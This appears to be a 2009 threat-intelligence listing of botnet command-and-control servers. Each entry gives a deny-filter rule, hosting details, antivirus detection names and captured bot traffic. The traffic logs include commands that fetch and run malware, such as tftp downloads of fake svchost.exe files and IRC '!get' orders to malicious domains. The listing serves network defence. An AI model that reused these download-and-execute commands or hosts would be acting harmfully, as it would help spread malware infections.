Download our list of the most observed botnet command and control server IP addresses.

Most Prolific BotNet Command and Control Servers and Filters

Fri Nov 6 08:34:01 2009

10 Day Filter Set      30 Day Filter Set      

Priority: 100
TCP Ports: 80 80 218 80 114 80 91
Filter: deny ip host 213.219.245.212 any log ! 464 infects 06/09/09 to 11/05/09
Domain: eastweb.ru
ISP: hosting and colocation services
Clients: 464
Country: russian federation
Activity Domain: eastweb.ru

Chatter Example
  • Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 87.250.57.232:8138
  • Server: GET /index.php?id=txphhhxqqjawgik&scn=0&inf=0&ver=20&cnt=USA...

BotClient Antivirus Diagnoses
AhnLab-V3: Korgo.9359.B
AntiVir: Korgo.X
Authentium: Korgo.W
Avast: Korgo-T
AVG: Padobot.W
BitDefender: Korgo.W
CAT-QuickHeal: Korgo.X
ClamAV: Korgo.Y
DrWeb: Lsabot
eSafe: Padobot.gen
eTrust-Vet: Korgo.AB
Ewido: Dropper.Paradrop.a
FileAdvisor: MISSED
Fortinet: Korgo.K!worm
F-Prot: Korgo.W
F-Secure: Padobot.gen
Ikarus: Korgo.K
Kaspersky: Padobot.gen
McAfee: Korgo.ab
Microsoft: Korgo.AB
NOD32v2: Korgo.Y
Norman: Korgo.Y
Panda: Korgo.AY.worm
Prevx1: KORGO.W
Rising: Korgo.x
Sophos: Korgo-K
Sunbelt: MISSED
Symantec: Korgo.X
TheHacker: Korgo(2).gen.pack
TrendMicro: MISSED
VBA32: Padobot.gen
VirusBuster: Korgo.AB
Webwasher-Gateway: Korgo.X
Priority: 100
TCP Ports: 2081 9890 9890 66 2010 9890 216
Filter: deny ip host 66.252.13.214 any log ! 252 infects 05/10/09 to 11/03/09
Domain: louisianadynamics.com
ISP: gigenet
Clients: 252
Country: united states
Activity Domain: louisianadynamics.com

Chatter Example
  • Client: USER a
  • Client: PASS a
  • Server: RETR Win15763.exe
  • Client: NICK F-olmgmodqUSER F-olmgmodq 0 0 :F-olmgmodq
  • Server: :211.cpe.netcabo.uk NOTICE AUTH :*** Looking up your...
  • Client: JOIN ##S## J
  • Server: :F-olmgmodq!F-olmgmodq@192.168.1.172 JOIN...
  • Client: USERHOST F-olmgmodqJOIN ##S## JUSERHOST F-olmgmodqJOIN ##S##...

BotClient Antivirus Diagnoses
AhnLab-V3: IRCBot.variant
AntiVir: TRCrypt.TPM.Gen
Authentium: Heuristic-210!Eldorado
Avast: MISSED
AVG: RBot.DN
BitDefender: MemScan_Backdoor.RBot.XYL
CAT-QuickHeal: Black.a
ClamAV: Packed-142
DrWeb: Packed.650
eSafe: MISSED
eTrust-Vet: ForBot.WP
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Packed.2D18!tr
F-Prot: Heuristic-210!Eldorado
F-Secure: Kolab.arp
Ikarus: Kolab
Kaspersky: Kolab.arp
McAfee: MISSED
Microsoft: Wootbot.gen
NOD32v2: MISSED
Norman: Malware.DQWL
Panda: MISSED
Prevx1: MISSED
Rising: Undef.blt
Sophos: MalGeneric-A
Sunbelt: Kolab.arp
Symantec: Spybot.Worm
TheHacker: Behav-Heuristic-064
TrendMicro: BKDR_SDBOT.FOG
VBA32: Wootbot
VirusBuster: Agobot.WPUZ
Webwasher-Gateway: MISSED
Priority: 72
TCP Ports: 65520 65520 85 65520 218 65520 69
Filter: deny ip host 221.5.74.39 any log ! 70 infects 06/25/09 to 08/17/09
Domain: cncnet.net
ISP: china unicom guangdong province network
Clients: 70
Country: china
Activity Domain: cncnet.net

Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 114.207.40.33 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 114.207.40.33 get dllhost.exe wins\DLLHOST.EXE
  • Client: NICK pxlisrppUSER l020501 . . :-
  • Client: JOIN &virtu
  • Server: :u. PRIVMSG pxlisrpp :!get...
  • Client: GET /EvID4226Patch.exe HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /gc.exe HTTP/1.0User-Agent: DownloadHost: put.ghura.plPragma:...
  • Server: GET...
  • Server: GET...
  • Server: GET /gt_ky.php HTTP/1.0User-Agent: Windows 5.1 (2600); DMCP ver...
  • Server: GET /get_93.php?p=152 HTTP/1.0User-Agent: Windows 5.1 (2600);...
  • Server: GET...
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: TRDownloader.Gen
Authentium: Downloader.F.gen!Eldorado
Avast: MISSED
AVG: Downloader.Generic8.BFCH
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: DownLoader.origin
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: PossibleThreat
F-Prot: Downloader.F.gen!Eldorado
F-Secure: Suspicious_Malware!Gemini
Ikarus: Zlob
Kaspersky: MISSED
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: DLoader.KZPW
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MalGeneric-A
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: PAK_Generic.001
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: MISSED
Priority: 71
TCP Ports: 65520 65520 216 65520 85 65520 221
Filter: deny ip host 218.93.205.24 any log ! 69 infects 06/26/09 to 08/14/09
Domain: 163data.com.cn
ISP: chinanet jiangsu province network
Clients: 69
Country: china
Activity Domain: 163data.com.cn

Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 116.120.239.76 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 116.120.239.76 get dllhost.exe wins\DLLHOST.EXE
  • Client: NICK ioroihzmUSER b020501 . . :-
  • Server: NICK ioroihzmUSER b020501 . . :-JOIN &virtu
  • Server: :u. PRIVMSG ioroihzm :!get http:/www.zief.pl/gc.exe:u. PRIVMSG...
  • Client: GET /gc.exe HTTP/1.0User-Agent: DownloadHost: www.zief.plPragma:...
  • Server: GET...
  • Server: GET...
  • Server: GET /gt_ky.php HTTP/1.0User-Agent: Windows 5.1 (2600); DMCP ver...
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Client: JOIN &virtu
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Server: GET /get_93.php?p=155 HTTP/1.0User-Agent: Windows 5.1 (2600);...
  • Server: GET...
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Server: PONG :i.
  • Client: JOIN &virtu

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: MISSED
Ikarus: MISSED
Kaspersky: MISSED
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: MISSED
Priority: 65
TCP Ports: 3305
Filter: deny ip host 61.120.62.28 any log ! 63 infects 05/22/09 to 08/22/09
Domain: dion.ne.jp
ISP: rabby_s inc
Clients: 63
Country: japan
Activity Domain: dion.ne.jp

Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 204.116.1.238 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 204.116.1.238 get dllhost.exe wins\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|bn0tpy3sxUSER w1m95y9mp * 0 :USA|2K|378
  • Server: :hub.63631.net 001 P|bn0tpy3sx...
  • Client: USERHOST P|bn0tpy3sx
  • Client: USERHOST P|bn0tpy3sxMODE P|bn0tpy3sx JOIN #mm RSA
  • Server: :hub.63631.net 302 P|bn0tpy3sx...

BotClient Antivirus Diagnoses
AhnLab-V3: Virut.B
AntiVir: Virut.AX
Authentium: Virut.7116
Avast: Virtob
AVG: Virut
BitDefender: Virtob.8.Gen
CAT-QuickHeal: Virut.Z
ClamAV: Virut-17
DrWeb: Virut.30
eSafe: MISSED
eTrust-Vet: Virut.7115
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Virut.AV
F-Prot: Virut.7116
F-Secure: Virut.av
Ikarus: Kolabc
Kaspersky: Virut.av
McAfee: Virut.gen.a
Microsoft: Virut.AC
NOD32v2: MISSED
Norman: Virut.AG
Panda: Virutas.FG
Prevx1: MISSED
Rising: Virut.an
Sophos: Virut-W
Sunbelt: MISSED
Symantec: Virut.W
TheHacker: Virut.av
TrendMicro: PE_VIRUT.AV
VBA32: Virut.2
VirusBuster: Virut.Gen.4
Webwasher-Gateway: MISSED
Priority: 62
TCP Ports: 65520 65520 91 65520 213
Filter: deny ip host 218.93.205.30 any log ! 60 infects 09/09/09 to 11/05/09
Domain: 163data.com.cn
ISP: chinanet jiangsu province network
Clients: 60
Country: china
Activity Domain: 163data.com.cn

Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 211.187.180.91 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 211.187.180.91 get dllhost.exe wins\DLLHOST.EXE
  • Client: NICK gulajgolUSER q020500 . . :_
  • Client: Service Pack 2JOIN &virtu
  • Server: :i. PRIVMSG gulajgol :!get http:/gidromash.cn/oc/box.txt
  • Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
  • Server: GET /lib/ssv.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /svc.php?file=isvchost.exe HTTP/1.0Accept: */*User-Agent:...
  • Server: GET /svc.php?file=svchost.exe HTTP/1.0Accept: */*User-Agent:...
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Server: GET /svc.php?file=svchust.exe HTTP/1.0Accept: */*User-Agent:...
  • Server: GET...
  • Server: GET...

BotClient Antivirus Diagnoses
AhnLab-V3: Virut
AntiVir: Virut.A
Authentium: Virut.4960
Avast: Nachi
AVG: Virut.A
BitDefender: Welchia.A
CAT-QuickHeal: Virut.A
ClamAV: Virut.A
DrWeb: Virut
eSafe: Virut.a
eTrust-Vet: Virut.5127
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Virut.A
F-Prot: Virut.4960
F-Secure: Virut.a
Ikarus: Virut.a
Kaspersky: Virut.a
McAfee: Virut.a
Microsoft: MISSED
NOD32v2: Virut.5127
Norman: Virut.A
Panda: Virutas.B
Prevx1: MISSED
Rising: Virut.az
Sophos: Virut-T
Sunbelt: MISSED
Symantec: Virut.A
TheHacker: Virut.gen
TrendMicro: PE_VIRUT.A
VBA32: Virut.A
VirusBuster: Nachi
Webwasher-Gateway: Virut.A
Priority: 48
TCP Ports: 3305
Filter: deny ip host 92.240.234.164 any log ! 47 infects 09/07/09 to 11/02/09
Domain: lightstorm.sk
ISP: lightstorm communications s.r.o
Clients: 47
Country: slovakia
Activity Domain: lightstorm.sk

Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 211.20.222.150 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 211.20.222.150 get dllhost.exe wins\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|mzlofyw7bUSER hpgbpr6lj * 0 :USA|2K|669
  • Server: :hub.2702.net 001 P|mzlofyw7b...
  • Client: USERHOST P|mzlofyw7b
  • Server: :hub.2702.net 302 P|mzlofyw7b...
  • Client: USERHOST P|mzlofyw7bMODE P|mzlofyw7b JOIN #mm RSA
  • Client: PRIVMSG #mm...

BotClient Antivirus Diagnoses
AhnLab-V3: IRCBot.Gen
AntiVir: TRATRAPS.Gen
Authentium: MISSED
Avast: DCom-F
AVG: SHeur2.AOLW
BitDefender: Generic.Mydoom.F72197F1
CAT-QuickHeal: Agent.gen
ClamAV: MISSED
DrWeb: HLLW.Piabot.origin
eSafe: MISSED
eTrust-Vet: IRCBot.PJ
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: Kolabc.gza
Ikarus: Exploit.MS06040
Kaspersky: Kolabc.gza
McAfee: Spybot.worm!l
Microsoft: Exploit_MS06040.gen
NOD32v2: MISSED
Norman: Atraps.MQB
Panda: TrjCI.A
Prevx1: MISSED
Rising: MISSED
Sophos: MalBehav-004
Sunbelt: MISSED
Symantec: Spybot.Worm
TheHacker: MISSED
TrendMicro: SPYBOT.BIM
VBA32: MISSED
VirusBuster: RBot.Gen.3
Webwasher-Gateway: MISSED
Priority: 48
TCP Ports: 65520 65520 218
Filter: deny ip host 91.212.220.75 any log ! 47 infects 09/11/09 to 10/30/09
Domain: -
ISP: group vertical ltd
Clients: 47
Country: russian federation
Activity Domain: -

Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 116.126.26.100 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 116.126.26.100 get dllhost.exe wins\DLLHOST.EXE
  • Client: NICK xdsexzfyUSER k020500 . . :-
  • Client: Service Pack 2JOIN &virtu
  • Server: :k. PRIVMSG xdsexzfy :!get http:/gidromash.cn/oc/box.txt
  • Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
  • Server: GET /lib/ssv.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: DownLoad.47549
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: Suspicious_Malware!Gemini
Ikarus: MISSED
Kaspersky: MISSED
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: MISSED
Priority: 35
TCP Ports: 65520 121 65520 69
Filter: deny ip host 114.80.101.21 any log ! 34 infects 05/30/09 to 06/25/09
Domain: online.sh.cn
ISP: chinanet shanghai province network
Clients: 34
Country: china
Activity Domain: online.sh.cn

Chatter Example
  • Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host:...
  • Client: NICK ricrsscdUSER d020501 . . :-
  • Client: JOIN &virtu
  • Server: :u. PRIVMSG ricrsscd :!get http:/brenz.pl/ex/a.php
  • Server: GET /ex/a.php HTTP/1.0User-Agent: DownloadHost: brenz.plPragma:...
  • Server: GET /mega/lgate.php?n=94AEEEDFFCB64848 HTTP/1.0Accept:...
  • Server: GET /stx9/fout.php HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /dll/mr.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: NICK tpiyrtkgUSER j020501 . . :-
  • Client: JOIN &virtu
  • Server: :u. PRIVMSG tpiyrtkg :!get...
  • Server: GET /ex/a.php HTTP/1.0User-Agent: DownloadHost: brenz.plPragma:...
  • Server: GET /mega/lgate.php?n=94AEEEDFFCB64848 HTTP/1.0Accept:...
  • Server: GET /dll/mr.txt HTTP/1.0Accept: */*If-Modified-Since: Thu, 18 Jun...
  • Server: PONG :m.
  • Client: JOIN &virtu
  • Server: PONG :m.
  • Client: JOIN &virtu

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: TRCrypt.XPACK.Gen
Authentium: MISSED
Avast: MISSED
AVG: Generic13.BEHA
BitDefender: BehavesLike_ExplorerHijack
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: Inject.5822
eSafe: TRCrypt.XPACK
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: Malware
Ikarus: Trojan-Downloader.Obitel
Kaspersky: Agent2.kov
McAfee: MISSED
Microsoft: TrojanDownloader_Obitel.gen!C
NOD32v2: MISSED
Norman: Malware
Panda: MISSED
Prevx1: MISSED
Rising: DL.Undef.euc
Sophos: MalGeneric-A
Sunbelt: MISSED
Symantec: Downloader
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: MISSED
Priority: 32
TCP Ports: 65520 65520 213
Filter: deny ip host 121.12.116.142 any log ! 31 infects 05/13/09 to 06/25/09
Domain: 163data.com.cn
ISP: chinanet guangdong province network
Clients: 31
Country: china
Activity Domain: 163data.com.cn

Chatter Example
  • Server: echo off&echo open 79.163.203.154 1023>>cmd.ftp&echo...
  • Client: USER anonymous
  • Client: PASS bin
  • Server: RETR 23902_upload.exe
  • Client: NICK ttcaruuwUSER e020501 . . :-
  • Client: JOIN &virtu
  • Server: :m. PRIVMSG ttcaruuw :!get http:/goasi.cn/ex/a.php
  • Server: :u. PRIVMSG ttcaruuw :!get...
  • Server: PONG :m.
  • Client: JOIN &virtu
  • Server: NICK srupkfvhUSER n020501 . . :-
  • Client: JOIN &virtu
  • Server: :m. PRIVMSG srupkfvh :!get http:/goasi.cn/ex/a.php
  • Server: :u. PRIVMSG srupkfvh :!get...
  • Client: GET /ex/a.php HTTP/1.0User-Agent: DownloadHost: goasi.cnPragma:...
  • Server: GET /files/adx.gif HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /cw.exe HTTP/1.0User-Agent: DownloadHost:...
  • Server: PONG :m.
  • Client: JOIN &virtu
  • Server: PONG :m.
  • Client: JOIN &virtu
  • Server: GET /mega/lgate.php?n=94AEEEDFFCB64848 HTTP/1.0Accept:...
  • Server: GET /dll/abb.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET / HTTP/1.0Host: www.google.comUser-Agent: Mozilla/4.0...
  • Client: POST /achcheck.php HTTP/1.0Host: upr15may.comUser-Agent:...
  • Client: POST /ld/gen.php HTTP/1.0Host: upr15may.comUser-Agent:...

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: TRCrypt.XPACK.Gen
Authentium: MISSED
Avast: MISSED
AVG: Generic13.BEHA
BitDefender: BehavesLike_ExplorerHijack
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: Inject.5822
eSafe: TRCrypt.XPACK
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: Malware
Ikarus: Trojan-Downloader.Obitel
Kaspersky: Agent2.kov
McAfee: MISSED
Microsoft: TrojanDownloader_Obitel.gen!C
NOD32v2: MISSED
Norman: Malware
Panda: MISSED
Prevx1: MISSED
Rising: DL.Undef.euc
Sophos: MalGeneric-A
Sunbelt: MISSED
Symantec: Downloader
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: MISSED
Priority: 30
TCP Ports: 16667
Filter: deny ip host 66.252.13.212 any log ! 29 infects 05/22/09 to 11/03/09
Domain: louisianadynamics.com
ISP: gigenet
Clients: 29
Country: united states
Activity Domain: louisianadynamics.com

Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR Tracker.exe
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK [USA]2K-SP2[00]8493USER ygaci 0 0...
  • Server: NICK [USA]2K-SP2[00]6761USER jutcf 0 0...
  • Server: :mi67.three.co.lt NOTICE AUTH :*** Looking up your...
  • Client: USERHOST [USA]2K-SP2[00]6761
  • Client: MODE [USA]2K-SP2[00]6761 -x+iJOIN #l# lamUSERHOST...
  • Server: PONG :mi67.three.co.lt
  • Client: JOIN #l# lam
  • Server: PONG :mi67.three.co.lt
  • Client: JOIN #l# lam
  • Server: NICK [USA]2K-SP2[00]0046USER etbtll 0 0...
  • Server: :mi67.three.co.lt NOTICE AUTH :*** Looking up your hostname...
  • Server: :mi67.three.co.lt NOTICE AUTH :*** Couldn't resolve your...
  • Server: PONG :mi67.three.co.ltJOIN #l# lam
  • Client: USERHOST [USA]2K-SP2[00]0046
  • Client: MODE [USA]2K-SP2[00]0046 -x+iJOIN #l# lamUSERHOST...
  • Server: PONG :mi67.three.co.ltJOIN #l# lam
  • Server: PONG :mi67.three.co.ltJOIN #l# lam
  • Server: PONG :mi67.three.co.ltJOIN #l# lam
  • Server: PONG :mi67.three.co.ltJOIN #l# lam

BotClient Antivirus Diagnoses
AhnLab-V3: Virut.B
AntiVir: Virut.AX
Authentium: Backdoor2.DKQM
Avast: Virtob
AVG: Virut
BitDefender: Generic.127971
CAT-QuickHeal: Virut.Z
ClamAV: Virut-54
DrWeb: HLLW.MyBot
eSafe: MISSED
eTrust-Vet: Virut.7115
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Virut.AV
F-Prot: Backdoor2.DKQM
F-Secure: Virut.av
Ikarus: VirTool.DelfInject
Kaspersky: Virut.av
McAfee: Virut.gen.a
Microsoft: Virut.AC
NOD32v2: MISSED
Norman: Agent.LSMS
Panda: Virutas.FG
Prevx1: MISSED
Rising: Mnless.akf
Sophos: Virut-W
Sunbelt: MISSED
Symantec: Virut.W
TheHacker: Virut.av
TrendMicro: PE_VIRUT.AV
VBA32: Virut.2
VirusBuster: Virut.Gen.4
Webwasher-Gateway: MISSED
Priority: 22
TCP Ports: 7000
Filter: deny ip host 87.118.98.185 any log ! 22 infects 09/01/09 to 09/04/09
Domain: keymachine.de
ISP: keyweb ag ip network
Clients: 22
Country: germany
Activity Domain: keymachine.de

Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR coder.exe
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK USA|00|XP|SP0|0204612USER wxvkwzjqc 0 0...
  • Server: :irc.oc256.com NOTICE AUTH :*** Looking up your...
  • Server: :irc.oc256.com NOTICE USA|00|XP|SP0|0204612 :*** If you are...
  • Server: PONG :DD5EF013
  • Client: JOIN ##nzm##
  • Client: USERHOST USA|00|XP|SP0|0204612MODE USA|00|XP|SP0|0204612 -x+iJOIN...
  • Client: PRIVMSG ##nzm## :\002n\002z\037m\037 (root.p\037l\037g)...

BotClient Antivirus Diagnoses
AhnLab-V3: Win-Agent.20480.AJY
AntiVir: TRDropper.Gen
Authentium: MISSED
Avast: MISSED
AVG: Dropper.Generic.AVFT
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: Poison.767
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: MISSED
Ikarus: Trojan-Ransom
Kaspersky: Trojan-Ransom.SMSer.in
McAfee: MISSED
Microsoft: VirTool_Injector.gen!Y
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: Rbot.afvq
VirusBuster: MISSED
Webwasher-Gateway: MISSED
Priority: 21
TCP Ports: 8080 72 10324 10324 72 10324 83
Filter: deny ip host 67.43.236.66 any log ! 21 infects 06/09/09 to 10/02/09
Domain: -
ISP: nader dara
Clients: 21
Country: lebanon
Activity Domain: -

Chatter Example
  • Client: USER 1
  • Client: PASS 1
  • Server: RETR Cilevb.com
  • Client: USER hfmgaw hfmgaw hfmgaw :cqzxfgrdrxjyjwhj
  • Client: NICK mrouBtig
  • Client: MODE mrouBtig +xi
  • Client: GET /gg2.exe HTTP/1.0Host: zone2tech.info
  • Server: GET /wsws.exe HTTP/1.0Host: zone2tech.info
  • Client: JOIN #las6 USERHOST mrouBtigMODE #m +smntu
  • Server: :mrouBtig!hfmgaw@192.168.1.144 JOIN :#las6:hub.58784.com 353...
  • Client: MODE #las6 +smntu
  • Server: :hub.58784.com 482 mrouBtig #las6 :You're not channel operator

BotClient Antivirus Diagnoses
AhnLab-V3: Virut.B
AntiVir: Virut.AX
Authentium: Virut.7116
Avast: Virtob
AVG: RBot.KB
BitDefender: Bot.95191
CAT-QuickHeal: Virut.Z
ClamAV: Virut-54
DrWeb: IRC.Sdbot.2665
eSafe: TRCrypt.nspm
eTrust-Vet: Virut.7115
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Virut.AV
F-Prot: Virut.7116
F-Secure: Nepoe.em
Ikarus: Crypt.NSPM
Kaspersky: MISSED
McAfee: Virut.gen.a
Microsoft: Virut.AC
NOD32v2: MISSED
Norman: Virut.AG
Panda: Virutas.FG
Prevx1: MISSED
Rising: Virut.an
Sophos: Virut-W
Sunbelt: MISSED
Symantec: Virut.W
TheHacker: Virut.av
TrendMicro: PE_VIRUT.AV
VBA32: Nepoe.em
VirusBuster: PoeBot.OB
Webwasher-Gateway: MISSED
Priority: 18
TCP Ports: 6669
Filter: deny ip host 89.138.22.15 any log ! 18 infects 07/09/09 to 07/09/09
Domain: netvision.net.il
ISP: bb-hfa
Clients: 18
Country: israel
Activity Domain: netvision.net.il

Chatter Example
  • Client: NICK USA|XP|SP0|00|7724USER pvser 0 0 :\002\0034CodeD \0038By...
  • Server: :fart.bitchassness.shit NOTICE USA|XP|SP0|00|7724 :*** If you are...
  • Server: PONG :9BB24218
  • Client: JOIN ##!X5 whores
  • Client: USERHOST USA|XP|SP0|00|7724
  • Client: MODE USA|XP|SP0|00|7724 -x+iJOIN ##!X5 whoresUSERHOST...

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: MISSED
Ikarus: MISSED
Kaspersky: MISSED
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: MISSED
Priority: 17
TCP Ports: 6900
Filter: deny ip host 78.155.216.238 any log ! 17 infects 09/29/09 to 09/30/09
Domain: -
ISP: mostelecom-customer
Clients: 17
Country: russian federation
Activity Domain: -

Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR utilmgr.exe
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK Gleason211USER xaqrn 0 0 :Gleason211
  • Server: :fart.bitchassness.shit NOTICE Gleason211 :*** If you are having...
  • Server: PONG :4FE4D7D7
  • Client: JOIN ##!X4
  • Client: USERHOST Gleason211MODE Gleason211 -x+iJOIN ##!X4 USERHOST...

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: IRCBackDoor.SdBot4.NNI
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: Kolab.eay
Ikarus: Kolab
Kaspersky: Kolab.eay
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MalGeneric-A
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: KOLAB.DW
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: MISSED
Priority: 15
TCP Ports: 10324
Filter: deny ip host 67.43.236.67 any log ! 15 infects 07/23/09 to 09/19/09
Domain: -
ISP: nader dara
Clients: 15
Country: lebanon
Activity Domain: -

Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 67.123.204.202 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 67.123.204.202 get dllhost.exe wins\DLLHOST.EXE
  • Client: USER xeodwo xeodwo xeodwo :pkjzcuvgmdbgctxb
  • Client: NICK BWeBcttR
  • Client: MODE BWeBcttR +xi
  • Client: GET /rs3.exe HTTP/1.0Host: nadsamcabran12.com
  • Client: JOIN #last USERHOST BWeBcttRMODE #m +smntuPRIVMSG #m...
